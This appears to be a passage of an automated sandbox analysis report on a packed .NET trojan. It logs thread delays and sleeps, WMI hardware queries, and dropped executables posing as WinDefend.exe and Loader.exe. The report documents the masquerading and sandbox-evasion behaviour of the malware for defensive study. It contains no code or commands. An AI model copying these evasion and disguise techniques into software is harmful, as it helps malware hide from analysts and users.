Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598090
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597745
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597320
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596604
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596270
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596141
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 593075
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592785
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592635
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592507
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592367
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592249
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592141
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592031
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591922
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591789
Source: C:\Users\user\AppData\Roaming\Loaader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 6116
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 2999
Source: C:\Users\user\AppData\Roaming\Loader.exe Window / User API: threadDelayed 9489
Source: C:\Users\user\AppData\Roaming\Loaader.exe Window / User API: threadDelayed 8044
Source: C:\Users\user\AppData\Roaming\Loaader.exe Window / User API: threadDelayed 1770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 8122
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 1610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9527
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 9073
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Window / User API: threadDelayed 641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8305
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 606
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe TID: 6556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 5340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Infected.exe TID: 2828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599524s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598556s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598433s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -598090s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597320s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596948s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596604s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596270s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -595684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -595563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99866s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99628s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99171s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -98937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99793s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99647s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99210s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -98874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -593075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592785s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592367s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -592031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -591922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 5244 Thread sleep time: -591789s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7312 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7556 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7708 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716 Thread sleep count: 9489 > 30
Source: C:\Users\user\AppData\Roaming\Loader.exe TID: 7716 Thread sleep count: 346 > 30
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7552 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loaader.exe TID: 7692 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736 Thread sleep count: 8122 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7736 Thread sleep count: 1610 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -199062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -198624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99201s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98978s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98830s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99521s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -97670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -97551s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -97316s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99746s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99936s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99742s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99561s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99319s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99060s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -98804s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -591993s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99876s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7732 Thread sleep time: -99758s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep count: 9626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504 Thread sleep count: 9073 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599877s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599738s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599612s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599476s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 7504 Thread sleep count: 641 > 30
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -599110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -598845s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99871s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99755s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99285s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99815s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99684s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99564s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99435s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98706s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98573s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98459s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99852s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99591s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99236s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -98872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99901s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99753s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe TID: 2072 Thread sleep time: -99615s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 9149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 Thread sleep count: 575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep count: 8305 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 Thread sleep count: 606 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
